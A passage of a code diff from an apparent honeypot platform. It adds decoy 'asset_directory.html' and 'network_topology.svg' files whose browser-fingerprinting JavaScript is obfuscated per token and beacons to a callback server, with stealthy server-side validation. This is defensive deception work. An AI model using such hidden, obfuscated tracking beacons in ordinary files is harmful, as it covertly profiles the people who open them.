f"{_FINGERPRINT_SECRET_ENV} is unset; fingerprint canaries cannot mint"
)
msg = f"{callback_token}|{mint_uuid}".encode("utf-8")
return hmac.new(secret.encode("utf-8"), msg, hashlib.sha256).hexdigest()[:16]
def _seed_from_token(callback_token: str) -> int:
"""Derive a 31-bit numeric seed from the callback token.
``javascript-obfuscator`` expects ``seed: number`` (int32-ish);
using a SHA-256-derived prefix gives us a uniform distribution
across the 31-bit positive range.
"""
h = hashlib.sha256(callback_token.encode("utf-8")).digest()
return int.from_bytes(h[:4], "big") & 0x7FFFFFFF
def _config_from_seed(seed: int) -> dict[str, Any]:
"""Build a deterministic, per-mint obfuscator config.
The hash bits drive *which* transforms apply — two mints get
structurally different outputs, not just different identifier names.
Defaults stay aggressive enough that reverse engineering is real
work; we never disable string-array or rename, only vary the dial.
"""
bits = seed
encodings = ("base64", "rc4")
string_array_encoding = [encodings[bits & 1]]
control_flow_threshold = 0.5 + ((bits >> 1) & 0xFF) / 512.0 # 0.5 .. ~1.0
dead_code_threshold = 0.2 + ((bits >> 9) & 0xFF) / 512.0 # 0.2 .. ~0.7
transform_object_keys = bool((bits >> 17) & 1)
numbers_to_expressions = bool((bits >> 18) & 1)
simplify = bool((bits >> 19) & 1)
return {
"compact": True,
"seed": seed,
"controlFlowFlattening": True,
"controlFlowFlatteningThreshold": round(control_flow_threshold, 3),
"deadCodeInjection": True,
"deadCodeInjectionThreshold": round(dead_code_threshold, 3),
"stringArray": True,
"stringArrayEncoding": string_array_encoding,
"stringArrayThreshold": 1,
"stringArrayRotate": True,
"stringArrayShuffle": True,
"splitStrings": True,
"splitStringsChunkLength": 4 + (bits & 7),
"transformObjectKeys": transform_object_keys,
"numbersToExpressions": numbers_to_expressions,
"simplify": simplify,
"selfDefending": False, # breaks SVG embed; not worth the cost
"renameGlobals": False,
"identifierNamesGenerator": "mangled-shuffled",
}
def obfuscate(code: str, *, callback_token: str) -> str:
"""Obfuscate *code* deterministically per *callback_token*.
Raises :class:`ObfuscatorError` if Node fails or returns empty.
"""
seed = _seed_from_token(callback_token)
options = _config_from_seed(seed)
payload = json.dumps({"code": code, "options": options})
try:
proc = subprocess.run( # nosec B603 — argv-form, no shell, fixed helper path; payload is JSON on stdin, not in argv
[_NODE_BIN, str(_HELPER)],
input=payload, capture_output=True, text=True,
timeout=_TIMEOUT_S, check=False,
)
except FileNotFoundError as e:
raise ObfuscatorError(f"node binary not found: {_NODE_BIN!r}") from e
except subprocess.TimeoutExpired as e:
raise ObfuscatorError("javascript-obfuscator timed out") from e
if proc.returncode != 0:
raise ObfuscatorError(
f"javascript-obfuscator failed rc={proc.returncode} "
f"stderr={proc.stderr.strip()[:400]}"
)
out = proc.stdout
if not out.strip():
raise ObfuscatorError("javascript-obfuscator returned empty output")
return out
def render_fingerprint_js(
*, callback_token: str, http_base: str, mint_uuid: str, nonce: str,
) -> str:
"""Build the obfuscated fingerprint JS for a single mint.
Substitutes ``{{BEACON_URL}}``, ``{{MINT_UUID}}``, and
``{{MINT_NONCE}}`` in the payload template, then runs it through
:func:`obfuscate` with a seed derived from the callback token.
The nonce is appended as ``&k=`` on every beacon URL the JS emits;
the worker rejects fingerprint payloads whose ``?k=`` doesn't match
the row's :attr:`CanaryToken.fingerprint_nonce`.
"""
template = _PAYLOAD.read_text(encoding="utf-8")
beacon = f"{http_base.rstrip('/')}/c/{callback_token}"
src = (
template
.replace("{{BEACON_URL}}", beacon)
.replace("{{MINT_UUID}}", mint_uuid)
.replace("{{MINT_NONCE}}", nonce)
)
return obfuscate(src, callback_token=callback_token)
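
The docstring for `render_fingerprint_js` says the worker rejects payloads whose `?k=` does not match the stored nonce. A minimal sketch of that comparison follows, assuming the stored value is the 16-character hex string produced by `nonce_for`. `compute_nonce` mirrors the HMAC construction above with the secret passed in explicitly, and `nonce_matches` is a hypothetical helper, not the worker's actual function.

```python
import hashlib
import hmac


def compute_nonce(secret: str, callback_token: str, mint_uuid: str) -> str:
    """Same construction as nonce_for, with the secret supplied by the caller."""
    msg = f"{callback_token}|{mint_uuid}".encode("utf-8")
    return hmac.new(secret.encode("utf-8"), msg, hashlib.sha256).hexdigest()[:16]


def nonce_matches(stored_nonce: str, supplied: object) -> bool:
    """Constant-time comparison of the stored nonce against the ?k= value."""
    if not isinstance(supplied, str):
        return False  # a missing query parameter arrives as None
    # Compare as bytes: compare_digest rejects non-ASCII str arguments.
    return hmac.compare_digest(stored_nonce.encode("utf-8"), supplied.encode("utf-8"))
```

Using `hmac.compare_digest` rather than `==` avoids leaking how many leading characters of a guessed nonce were correct.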


@@ -0,0 +1,10 @@
{
"name": "decnet-canary-obfuscator",
"version": "0.1.0",
"private": true,
"description": "Node helper for decnet.canary.obfuscator — javascript-obfuscator wrapper invoked via subprocess.",
"main": "_obfuscate_helper.js",
"dependencies": {
"javascript-obfuscator": "^5.4.2"
}
}


@@ -28,6 +28,8 @@ _LINUX_DEFAULTS: dict[str, str] = {
"honeydoc": "/home/{user}/Documents/quarterly_report.html", "honeydoc": "/home/{user}/Documents/quarterly_report.html",
"honeydoc_docx": "/home/{user}/Documents/quarterly_report.docx", "honeydoc_docx": "/home/{user}/Documents/quarterly_report.docx",
"honeydoc_pdf": "/home/{user}/Documents/quarterly_report.pdf", "honeydoc_pdf": "/home/{user}/Documents/quarterly_report.pdf",
"fingerprint_html": "/home/{user}/Documents/asset_directory.html",
"fingerprint_svg": "/home/{user}/Documents/network_topology.svg",
} }
_WINDOWS_DEFAULTS: dict[str, str] = { _WINDOWS_DEFAULTS: dict[str, str] = {
@@ -38,6 +40,8 @@ _WINDOWS_DEFAULTS: dict[str, str] = {
"honeydoc": "/home/{user}/Documents/quarterly_report.html", "honeydoc": "/home/{user}/Documents/quarterly_report.html",
"honeydoc_docx": "/home/{user}/Documents/quarterly_report.docx", "honeydoc_docx": "/home/{user}/Documents/quarterly_report.docx",
"honeydoc_pdf": "/home/{user}/Documents/quarterly_report.pdf", "honeydoc_pdf": "/home/{user}/Documents/quarterly_report.pdf",
"fingerprint_html": "/home/{user}/Documents/asset_directory.html",
"fingerprint_svg": "/home/{user}/Documents/network_topology.svg",
} }


@@ -20,11 +20,8 @@ shape but speaks bytes-via-base64 over the wire.
""" """
from __future__ import annotations from __future__ import annotations
import asyncio
import base64
import os import os
import shlex from datetime import datetime, timedelta, timezone
import time
from secrets import token_urlsafe from secrets import token_urlsafe
from typing import Any, Iterable, Optional from typing import Any, Iterable, Optional
@@ -34,13 +31,16 @@ from decnet.bus.factory import get_bus
from decnet.canary.base import CanaryArtifact, CanaryContext from decnet.canary.base import CanaryArtifact, CanaryContext
from decnet.canary.factory import get_generator from decnet.canary.factory import get_generator
from decnet.canary.paths import default_path_for from decnet.canary.paths import default_path_for
from decnet.decky_io import (
delete_file_from_container,
resolve_topology_container,
write_file_to_container,
)
from decnet.logging import get_logger from decnet.logging import get_logger
from decnet.web.db.repository import BaseRepository from decnet.web.db.repository import BaseRepository
log = get_logger("canary.planter") log = get_logger("canary.planter")
_DOCKER = "docker"
_TIMEOUT = 8.0
# Container suffix — matches the orchestrator SSH driver's convention # Container suffix — matches the orchestrator SSH driver's convention
# (``<decky_name>-ssh``). Canary placement always happens through the # (``<decky_name>-ssh``). Canary placement always happens through the
# ssh container because every decky has one and it carries the most # ssh container because every decky has one and it carries the most
@@ -52,62 +52,16 @@ def _container_for(decky_name: str) -> str:
return f"{decky_name}{_SSH_CONTAINER_SUFFIX}" return f"{decky_name}{_SSH_CONTAINER_SUFFIX}"
def _dirname(path: str) -> str: # resolve_topology_container is re-exported from decky_io for back-compat
idx = path.rfind("/") # with callers (tests, deploy hook) that imported it from this module
if idx <= 0: # before the decky_io extraction.
return "/" __all__ = [
return path[:idx] "plant",
"revoke",
"resolve_topology_container",
async def _run( "seed_baseline",
argv: list[str], *, stdin_bytes: Optional[bytes] = None, "seed_baseline_topology",
) -> tuple[int, str, str]: ]
try:
proc = await asyncio.create_subprocess_exec(
*argv,
stdin=asyncio.subprocess.PIPE if stdin_bytes is not None else None,
stdout=asyncio.subprocess.PIPE,
stderr=asyncio.subprocess.PIPE,
)
except FileNotFoundError as exc:
return 127, "", f"argv[0] not found: {exc}"
try:
stdout, stderr = await asyncio.wait_for(
proc.communicate(input=stdin_bytes), timeout=_TIMEOUT,
)
except asyncio.TimeoutError:
try:
proc.kill()
except ProcessLookupError:
pass
return 124, "", "timeout"
return (
proc.returncode if proc.returncode is not None else -1,
stdout.decode("utf-8", "replace"),
stderr.decode("utf-8", "replace"),
)
def _build_plant_command(artifact: CanaryArtifact) -> tuple[str, bytes]:
"""Compose the ``sh -c`` script + stdin payload for one artifact.
Binary safety: we base64-encode on the host and stream the result
over stdin to ``base64 -d`` inside the container, so the bytes
never touch the argv (kernel ARG_MAX would reject anything larger
than ~128KB-2MB depending on the host). Both ``base64`` (coreutils)
and ``touch -d @<unix_ts>`` are present on every Linux base image
we ship, so there's no per-distro branching.
"""
encoded = base64.b64encode(artifact.content)
mtime = int(time.time() + artifact.mtime_offset)
mode_str = oct(artifact.mode)[2:]
parts = [
f"mkdir -p {shlex.quote(_dirname(artifact.path))}",
f"base64 -d > {shlex.quote(artifact.path)}",
f"chmod {mode_str} {shlex.quote(artifact.path)}",
f"touch -d @{mtime} {shlex.quote(artifact.path)}",
]
return " && ".join(parts), encoded
async def _publish( async def _publish(
@@ -139,6 +93,7 @@ async def plant(
repo: Optional[BaseRepository] = None, repo: Optional[BaseRepository] = None,
publish: bool = True, publish: bool = True,
bus: Optional[BaseBus] = None, bus: Optional[BaseBus] = None,
container: Optional[str] = None,
) -> tuple[bool, Optional[str]]: ) -> tuple[bool, Optional[str]]:
"""Write *artifact* into the decky's ssh container. """Write *artifact* into the decky's ssh container.
@@ -157,13 +112,12 @@ async def plant(
await repo.update_canary_token_state(token_uuid, "failed", err) await repo.update_canary_token_state(token_uuid, "failed", err)
return False, err return False, err
sh_cmd, stdin_payload = _build_plant_command(artifact) target_container = container or _container_for(decky_name)
# ``-i`` keeps stdin attached so base64 -d inside the container can mtime = datetime.now(timezone.utc) + timedelta(seconds=artifact.mtime_offset)
# consume the encoded payload streamed from the host. success, error = await write_file_to_container(
argv = [_DOCKER, "exec", "-i", _container_for(decky_name), "sh", "-c", sh_cmd] target_container, artifact.path, artifact.content,
rc, _stdout, stderr = await _run(argv, stdin_bytes=stdin_payload) mode=artifact.mode, mtime=mtime,
success = rc == 0 )
error = None if success else (stderr.strip()[:256] or f"rc={rc}")
if repo is not None: if repo is not None:
if success: if success:
@@ -182,8 +136,8 @@ async def plant(
if not success: if not success:
log.warning( log.warning(
"canary.plant failed decky=%s token=%s rc=%d stderr=%r", "canary.plant failed decky=%s token=%s container=%s err=%r",
decky_name, token_uuid, rc, stderr[:120], decky_name, token_uuid, target_container, error,
) )
return success, error return success, error
@@ -196,6 +150,7 @@ async def revoke(
repo: Optional[BaseRepository] = None, repo: Optional[BaseRepository] = None,
publish: bool = True, publish: bool = True,
bus: Optional[BaseBus] = None, bus: Optional[BaseBus] = None,
container: Optional[str] = None,
) -> tuple[bool, Optional[str]]: ) -> tuple[bool, Optional[str]]:
"""Best-effort unlink + state transition + bus publish. """Best-effort unlink + state transition + bus publish.
@@ -203,11 +158,10 @@ async def revoke(
the file is gone after the call (whether we deleted it or it was the file is gone after the call (whether we deleted it or it was
already missing); only docker / container-down errors return False. already missing); only docker / container-down errors return False.
""" """
sh_cmd = f"rm -f {shlex.quote(placement_path)}" target_container = container or _container_for(decky_name)
argv = [_DOCKER, "exec", _container_for(decky_name), "sh", "-c", sh_cmd] success, error = await delete_file_from_container(
rc, _stdout, stderr = await _run(argv) target_container, placement_path,
success = rc == 0 )
error = None if success else (stderr.strip()[:256] or f"rc={rc}")
if repo is not None: if repo is not None:
await repo.update_canary_token_state(token_uuid, "revoked", error if not success else None) await repo.update_canary_token_state(token_uuid, "revoked", error if not success else None)
@@ -250,6 +204,7 @@ async def seed_baseline(
persona: str = "linux", persona: str = "linux",
created_by: str = "system", created_by: str = "system",
bus: Optional[BaseBus] = None, bus: Optional[BaseBus] = None,
container: Optional[str] = None,
) -> list[dict[str, Any]]: ) -> list[dict[str, Any]]:
"""Plant the configured baseline canary set on one decky. """Plant the configured baseline canary set on one decky.
@@ -293,9 +248,59 @@ async def seed_baseline(
await plant( await plant(
decky_name, artifact, decky_name, artifact,
token_uuid=token_uuid, repo=repo, publish=True, bus=bus, token_uuid=token_uuid, repo=repo, publish=True, bus=bus,
container=container,
) )
out.append({ out.append({
"token_uuid": token_uuid, "generator": gen_name, "kind": kind, "token_uuid": token_uuid, "generator": gen_name, "kind": kind,
"callback_token": slug, "placement_path": artifact.path, "callback_token": slug, "placement_path": artifact.path,
}) })
return out return out
async def seed_baseline_topology(
repo: BaseRepository,
topology_id: str,
*,
created_by: str = "system",
bus: Optional[BaseBus] = None,
) -> list[dict[str, Any]]:
"""Plant baseline canaries on every decky in a MazeNET topology.
Mirrors :func:`seed_baseline` for the topology path. Container name
resolution uses :func:`resolve_topology_container` since topology
deckies may not have an ssh service — in that case we target the
base container instead.
Best-effort: failures on any single decky are logged inside
:func:`plant`; the deploy hook treats the return value as
informational. Returns a flat list of per-token dicts (with an added
``decky_name`` key) across all deckies.
"""
from decnet.topology.persistence import hydrate
hydrated = await hydrate(repo, topology_id)
if hydrated is None:
log.warning(
"canary.seed_baseline_topology: topology %s not found", topology_id,
)
return []
out: list[dict[str, Any]] = []
for decky in hydrated["deckies"]:
cfg = decky.get("decky_config") or {}
decky_name = cfg.get("name") or decky.get("name")
if not decky_name:
continue
services = decky.get("services") or []
container = resolve_topology_container(topology_id, decky_name, services)
# MazeNET deckies don't carry an OS persona today; default to
# linux (every base image we ship is Linux).
rows = await seed_baseline(
decky_name, repo,
persona="linux", created_by=created_by, bus=bus,
container=container,
)
for r in rows:
r["decky_name"] = decky_name
out.append(r)
return out
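
Two small pieces of the refactored `plant` path are easy to show on their own: the backdated modification time and the container fallback. This is a sketch under assumptions. `backdated_mtime` and `target_container` are hypothetical names, and the `-ssh` suffix is taken from the comment in this module rather than from the constant itself.

```python
from datetime import datetime, timedelta, timezone
from typing import Optional


def backdated_mtime(mtime_offset: int, now: Optional[datetime] = None) -> datetime:
    """Apply a (usually negative) offset in seconds to the current UTC time."""
    now = now or datetime.now(timezone.utc)
    return now + timedelta(seconds=mtime_offset)


def target_container(decky_name: str, container: Optional[str] = None) -> str:
    """Prefer an explicit container name, else fall back to '<decky_name>-ssh'."""
    return container or f"{decky_name}-ssh"
```

With an offset of `-86400 * 14`, as the HTML generator uses, a file planted today carries a timestamp two weeks in the past.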


@@ -26,9 +26,14 @@ crashes loudly rather than masking failures.
from __future__ import annotations from __future__ import annotations
import asyncio import asyncio
import base64
import binascii
import json
import os import os
import time
import uuid
from datetime import datetime, timezone from datetime import datetime, timezone
from typing import Optional from typing import Any, Optional
from fastapi import FastAPI, Request, Response from fastapi import FastAPI, Request, Response
@@ -50,6 +55,41 @@ _TRANSPARENT_GIF = bytes.fromhex(
) )
# Namespace used by fingerprint generators to derive mint UUID.
# Must stay in sync with fingerprint_html._MINT_NAMESPACE.
_MINT_NAMESPACE = uuid.UUID("a3f7c821-9d1e-4b6a-8c2d-1e4f9a7b3c5d")
# In-memory per-(token_uuid, src_ip) rate limiter for fingerprint persists.
# Maps (token_uuid, src_ip) -> list of monotonic timestamps.
# Not shared across worker restarts or processes, and keys are never
# evicted once created; acceptable for MVP.
_FP_RATE_WINDOW_S = 60
_FP_RATE_LIMIT = 30
_fp_rate_buckets: dict[tuple[str, str], list[float]] = {}
def _fp_rate_allowed(token_uuid: str, src_ip: str) -> bool:
key = (token_uuid, src_ip)
now = time.monotonic()
cutoff = now - _FP_RATE_WINDOW_S
bucket = _fp_rate_buckets.get(key, [])
bucket = [t for t in bucket if t > cutoff]
if len(bucket) >= _FP_RATE_LIMIT:
_fp_rate_buckets[key] = bucket
return False
bucket.append(now)
_fp_rate_buckets[key] = bucket
return True
def _is_valid_fp_shape(fp: dict) -> bool:
"""Layer B — structural sanity check on a decoded fingerprint blob."""
if not isinstance(fp.get("mint"), str) or not fp["mint"]:
return False
known_keys = {"nav", "scr", "tz", "cv", "gl", "au", "ft", "rtc"}
present = sum(1 for k in known_keys if isinstance(fp.get(k), dict))
return present >= 3
def _http_base() -> str: def _http_base() -> str:
return os.environ.get("DECNET_CANARY_HTTP_BASE", "http://localhost:8088").rstrip("/") return os.environ.get("DECNET_CANARY_HTTP_BASE", "http://localhost:8088").rstrip("/")
@@ -104,6 +144,11 @@ def _build_app(repo: BaseRepository, bus: BaseBus) -> FastAPI:
@app.get("/c/{slug}") @app.get("/c/{slug}")
async def callback(slug: str, request: Request) -> Response: async def callback(slug: str, request: Request) -> Response:
raw_nonce = request.query_params.get("k")
fp_meta, parsed_fp = _extract_fingerprint(request.query_params)
merged_headers = dict(request.headers)
if fp_meta:
merged_headers.update(fp_meta)
await _record_hit( await _record_hit(
repo, bus, repo, bus,
slug=slug, slug=slug,
@@ -111,7 +156,9 @@ def _build_app(repo: BaseRepository, bus: BaseBus) -> FastAPI:
user_agent=request.headers.get("user-agent"), user_agent=request.headers.get("user-agent"),
request_path=str(request.url.path), request_path=str(request.url.path),
dns_qname=None, dns_qname=None,
raw_headers=dict(request.headers), raw_headers=merged_headers,
parsed_fp=parsed_fp,
raw_nonce=raw_nonce,
) )
# Always 200 with a tiny image so the attacker's client sees # Always 200 with a tiny image so the attacker's client sees
# a "success" — same return regardless of whether the slug is # a "success" — same return regardless of whether the slug is
@@ -129,6 +176,67 @@ def _build_app(repo: BaseRepository, bus: BaseBus) -> FastAPI:
return app return app
# Per-chunk size cap. Real fingerprints fit in one ~3KB GET; honest
# overflow is handled via chunking (s/i/n + d). Anything larger than
# this on a single request is junk, so we drop it instead of letting an
# attacker inflate a trigger row indefinitely.
_FP_CHUNK_MAX = 8 * 1024
def _extract_fingerprint(qp: Any) -> tuple[dict[str, Any], Optional[dict]]:
"""Decode fingerprint-payload query params into (meta_dict, parsed_fp).
The obfuscated browser payload may send three shapes on ``GET /c/<slug>``:
* ``?o=1`` — bare-open beacon, fired before fingerprinting starts.
* ``?d=<b64url-json>`` — single-shot fingerprint dump.
* ``?s=<sid>&i=<idx>&n=<total>&d=<b64url-chunk>`` — chunked dump.
Returns a tuple of:
- ``meta`` — flat dict with ``_fp_*`` keys to merge into raw_headers.
- ``parsed_fp`` — the decoded fingerprint dict for validation, or ``None``
when there's no ``?d=`` or decoding fails.
"""
out: dict[str, Any] = {}
parsed_fp: Optional[dict] = None
if not qp:
return out, parsed_fp
o = qp.get("o") if hasattr(qp, "get") else None
if o:
out["_fp_open"] = "1"
d = qp.get("d") if hasattr(qp, "get") else None
if not d:
return out, parsed_fp
if len(d) > _FP_CHUNK_MAX:
out["_fp_oversize"] = "1"
return out, parsed_fp
sid = qp.get("s")
idx = qp.get("i")
total = qp.get("n")
if sid and idx and total:
out["_fp_sid"] = sid
out["_fp_idx"] = idx
out["_fp_total"] = total
out["_fp_chunk"] = d
return out, parsed_fp
# Single-shot: decode and pass back as parsed_fp; validation runs in
# _record_hit after token lookup so we have the stored nonce at hand.
try:
padded = d + "=" * (-len(d) % 4)
raw = base64.urlsafe_b64decode(padded.encode("ascii"))
parsed = json.loads(raw.decode("utf-8"))
except (binascii.Error, ValueError, UnicodeDecodeError):
out["_fp_decode_error"] = "1"
return out, parsed_fp
if isinstance(parsed, dict):
parsed_fp = parsed
else:
out["_fp_decode_error"] = "1"
return out, parsed_fp
def _client_ip(request: Request) -> str: def _client_ip(request: Request) -> str:
# Honor X-Forwarded-For if the operator deployed behind a reverse # Honor X-Forwarded-For if the operator deployed behind a reverse
# proxy. Take the leftmost address in the chain; everything after # proxy. Take the leftmost address in the chain; everything after
@@ -154,16 +262,58 @@ async def _record_hit(
request_path: Optional[str], request_path: Optional[str],
dns_qname: Optional[str], dns_qname: Optional[str],
raw_headers: Optional[dict], raw_headers: Optional[dict],
parsed_fp: Optional[dict] = None,
raw_nonce: Optional[str] = None,
) -> None: ) -> None:
"""Resolve slug -> token, persist a trigger, publish on the bus. """Resolve slug -> token, persist a trigger, publish on the bus.
Unknown slugs are silently swallowed: returning the same response Unknown slugs are silently swallowed: returning the same response
for known and unknown slugs is the stealth posture, and persisting for known and unknown slugs is the stealth posture, and persisting
every random scan would clutter the DB. every random scan would clutter the DB.
When *parsed_fp* is present (single-shot fingerprint decode succeeded),
it is validated through four layers before being merged into raw_headers:
A) nonce match against CanaryToken.fingerprint_nonce,
B) structural shape check,
C) mint UUID consistency,
D) per-(token, IP) rate limit.
Each failure drops the structured ``_fp`` and sets the matching marker key:
``_fp_invalid_nonce``, ``_fp_invalid_shape``, ``_fp_invalid_mint``, or
``_fp_rate_limited``.
The trigger row always lands regardless — the GET hit is itself forensic.
""" """
token = await repo.get_canary_token_by_slug(slug) token = await repo.get_canary_token_by_slug(slug)
if token is None: if token is None:
return return
final_headers: dict[str, Any] = dict(raw_headers or {})
if parsed_fp is not None:
stored_nonce: Optional[str] = token.get("fingerprint_nonce")
# Layer A — nonce
if stored_nonce is not None and raw_nonce != stored_nonce:
final_headers["_fp_invalid_nonce"] = "1"
parsed_fp = None
# Layer B — shape (only when nonce passed or no nonce enforced)
if parsed_fp is not None and not _is_valid_fp_shape(parsed_fp):
final_headers["_fp_invalid_shape"] = "1"
parsed_fp = None
# Layer C — mint UUID consistency
if parsed_fp is not None:
expected_mint = str(uuid.uuid5(_MINT_NAMESPACE, slug))
if parsed_fp.get("mint") != expected_mint:
final_headers["_fp_invalid_mint"] = "1"
parsed_fp = None
# Layer D — rate limit
if parsed_fp is not None and not _fp_rate_allowed(token["uuid"], src_ip):
final_headers["_fp_rate_limited"] = "1"
parsed_fp = None
if parsed_fp is not None:
final_headers["_fp"] = parsed_fp
trigger_id = await repo.record_canary_trigger({ trigger_id = await repo.record_canary_trigger({
"token_uuid": token["uuid"], "token_uuid": token["uuid"],
"occurred_at": datetime.now(timezone.utc), "occurred_at": datetime.now(timezone.utc),
@@ -171,7 +321,7 @@ async def _record_hit(
"user_agent": user_agent, "user_agent": user_agent,
"request_path": request_path, "request_path": request_path,
"dns_qname": dns_qname, "dns_qname": dns_qname,
"raw_headers": raw_headers or {}, "raw_headers": final_headers,
}) })
try: try:
await bus.publish( await bus.publish(
@@ -189,6 +339,22 @@ async def _record_hit(
except Exception as e: # noqa: BLE001 — best effort except Exception as e: # noqa: BLE001 — best effort
log.warning("canary.triggered publish failed slug=%s err=%s", slug, e) log.warning("canary.triggered publish failed slug=%s err=%s", slug, e)
# Auto-deregister fingerprint canaries after the first valid fingerprint
# is collected. Slug goes dark; the stealth posture means the attacker
# sees the same 200 + GIF on the next hit — nothing reveals the revocation.
# Guard: only fingerprint tokens have a non-NULL fingerprint_nonce; plain
# http/dns canaries are NOT auto-revoked.
if parsed_fp is not None and token.get("fingerprint_nonce") is not None:
try:
await repo.update_canary_token_state(token["uuid"], "revoked")
await bus.publish(
topics.canary(token["uuid"], topics.CANARY_REVOKED),
{"token_id": token["uuid"], "trigger_id": trigger_id,
"reason": "fingerprint_collected"},
)
except Exception as e: # noqa: BLE001 — trigger row already landed; best effort
log.warning("canary.deregister failed token=%s err=%s", token["uuid"], e)
# ---------------------------- DNS surface -------------------------------- # ---------------------------- DNS surface --------------------------------
@@ -214,7 +380,7 @@ async def _start_dns_server(
local_addr=(_dns_bind(), _dns_port()), local_addr=(_dns_bind(), _dns_port()),
) )
log.info("canary.dns listening zone=%s port=%d", zone, _dns_port()) log.info("canary.dns listening zone=%s port=%d", zone, _dns_port())
return transport # type: ignore[return-value] return transport
# ---------------------------- entry point -------------------------------- # ---------------------------- entry point --------------------------------
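
The single-shot decode and validation layers B to D in the canary worker diff above can be sketched in isolation as follows. This is a minimal illustration under stated assumptions, not the project's code: only the namespace UUID, the known-key set, and the 60 s / 30-hit window are taken from the diff. `encode_fp`, `decode_fp`, `rate_allowed`, and `validate` are hypothetical names, and the clock is passed in explicitly so the window can be exercised without sleeping.

```python
import base64
import json
import uuid
from typing import Optional

# Namespace, key set, and limits copied from the diff; all function names
# below are illustrative and do not exist in the project.
MINT_NAMESPACE = uuid.UUID("a3f7c821-9d1e-4b6a-8c2d-1e4f9a7b3c5d")
KNOWN_KEYS = {"nav", "scr", "tz", "cv", "gl", "au", "ft", "rtc"}
WINDOW_S, LIMIT = 60.0, 30
_buckets: dict[tuple[str, str], list[float]] = {}


def encode_fp(fp: dict) -> str:
    """Hypothetical client side: JSON -> unpadded base64url for ``?d=``."""
    raw = json.dumps(fp, separators=(",", ":")).encode("utf-8")
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def decode_fp(d: str) -> Optional[dict]:
    """Restore padding, decode, and accept only a JSON object."""
    try:
        padded = d + "=" * (-len(d) % 4)
        parsed = json.loads(base64.urlsafe_b64decode(padded.encode("ascii")))
    except ValueError:  # binascii.Error and the JSON/Unicode errors subclass ValueError
        return None
    return parsed if isinstance(parsed, dict) else None


def rate_allowed(key: tuple[str, str], now: float) -> bool:
    """Sliding window: keep timestamps newer than the cutoff, then count."""
    bucket = [t for t in _buckets.get(key, []) if t > now - WINDOW_S]
    allowed = len(bucket) < LIMIT
    if allowed:
        bucket.append(now)
    _buckets[key] = bucket
    return allowed


def validate(fp: dict, slug: str, key: tuple[str, str], now: float) -> Optional[str]:
    """Return the name of the first failing layer (B, C, D), or None if all pass."""
    if not isinstance(fp.get("mint"), str) or not fp["mint"]:
        return "shape"
    if sum(1 for k in KNOWN_KEYS if isinstance(fp.get(k), dict)) < 3:
        return "shape"
    if fp["mint"] != str(uuid.uuid5(MINT_NAMESPACE, slug)):
        return "mint"
    if not rate_allowed(key, now):
        return "rate"
    return None
```

Because the layers run in order, a payload that fails the shape or mint check never consumes a slot in the rate-limit bucket, which matches the short-circuit structure of `_record_hit`.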


@@ -39,6 +39,7 @@ from . import (
swarm, swarm,
swarmctl, swarmctl,
topology, topology,
ttp,
updater, updater,
web, web,
webhook, webhook,
@@ -59,7 +60,7 @@ for _mod in (
swarm, swarm,
deploy, lifecycle, workers, inventory, deploy, lifecycle, workers, inventory,
web, profiler, orchestrator, realism, reconciler, sniffer, db, web, profiler, orchestrator, realism, reconciler, sniffer, db,
topology, bus, geoip, init, webhook, canary, topology, bus, geoip, init, webhook, canary, ttp,
): ):
_mod.register(app) _mod.register(app)


@@ -1,8 +1,13 @@
"""``decnet canary`` — HTTP + DNS callback receiver for canary tokens. """``decnet canary`` — HTTP + DNS callback receiver for canary tokens.
Worker process. Mirrors the shape of :mod:`decnet.cli.webhook`: a Two entry points share this module:
``@app.command(name="canary")`` Typer entry point that delegates to
:func:`decnet.canary.worker.run`. * ``decnet canary`` — runs the worker process. Mirrors the shape of
:mod:`decnet.cli.webhook`. Invoked by the ``decnet-canary.service``
systemd unit so its argv must stay stable.
* ``decnet canary-install-toolchain`` — provisions the Node side of
the fingerprint-canary obfuscator. Idempotent; safe to call from
the API service unit's ``ExecStartPre``.
Not master-only — any host that hosts deckies can run its own Not master-only — any host that hosts deckies can run its own
canary worker (the bus events stay local; the webhook worker on canary worker (the bus events stay local; the webhook worker on
@@ -11,11 +16,17 @@ in ``development/let-s-move-to-the-enumerated-pike.md``).
""" """
from __future__ import annotations from __future__ import annotations
import shutil
import subprocess # nosec B404 — npm exec is the whole point of the toolchain installer
from pathlib import Path
import typer import typer
from . import utils as _utils from . import utils as _utils
from .utils import console, log from .utils import console, log
_TOOLCHAIN_TIMEOUT_S = 180
def register(app: typer.Typer) -> None: def register(app: typer.Typer) -> None:
@app.command(name="canary") @app.command(name="canary")
@@ -40,3 +51,53 @@ def register(app: typer.Typer) -> None:
asyncio.run(run()) asyncio.run(run())
except KeyboardInterrupt: except KeyboardInterrupt:
console.print("\n[yellow]Canary worker stopped.[/]") console.print("\n[yellow]Canary worker stopped.[/]")
@app.command(name="canary-install-toolchain")
def canary_install_toolchain(
npm_bin: str = typer.Option(
"npm", "--npm-bin", help="Path to the npm executable. Defaults to PATH lookup.",
),
) -> None:
"""Install the Node-side toolchain used by fingerprint canaries.
Runs ``npm install --omit=dev`` under the installed ``decnet/canary/``
directory so the obfuscator's helper script can ``require()``
``javascript-obfuscator`` at mint time. Requires Node >= 18.
Idempotent: re-running on an already-installed tree is fast
(npm short-circuits when ``node_modules/`` is up-to-date).
"""
import decnet.canary as _canary_pkg
canary_dir = Path(_canary_pkg.__file__).resolve().parent
if not (canary_dir / "package.json").is_file():
console.print(
f"[red]canary package.json not found under {canary_dir}; "
"wheel may be missing the JS toolchain payload.[/]"
)
raise typer.Exit(code=2)
if shutil.which(npm_bin) is None:
console.print(
f"[red]npm executable {npm_bin!r} not found on PATH. "
"Install Node >= 18 and re-run.[/]"
)
raise typer.Exit(code=2)
console.print(
f"[cyan]installing canary toolchain[/] in {canary_dir}",
)
try:
proc = subprocess.run( # nosec B603 — argv-form, no shell, fixed cwd, npm_bin checked above
[npm_bin, "install", "--omit=dev", "--no-fund", "--no-audit"],
cwd=str(canary_dir),
capture_output=True, text=True,
timeout=_TOOLCHAIN_TIMEOUT_S, check=False,
)
except subprocess.TimeoutExpired:
console.print(f"[red]npm install timed out after {_TOOLCHAIN_TIMEOUT_S}s[/]")
raise typer.Exit(code=3) from None
if proc.returncode != 0:
console.print(
f"[red]npm install failed rc={proc.returncode}[/]\n"
f"{proc.stderr.strip()}"
)
raise typer.Exit(code=proc.returncode)
console.print("[green]canary toolchain ready[/]")


@@ -30,6 +30,10 @@ MASTER_ONLY_COMMANDS: frozenset[str] = frozenset({
"mutate", "listener", "profiler", "mutate", "listener", "profiler",
"services", "distros", "correlate", "archetypes", "web", "services", "distros", "correlate", "archetypes", "web",
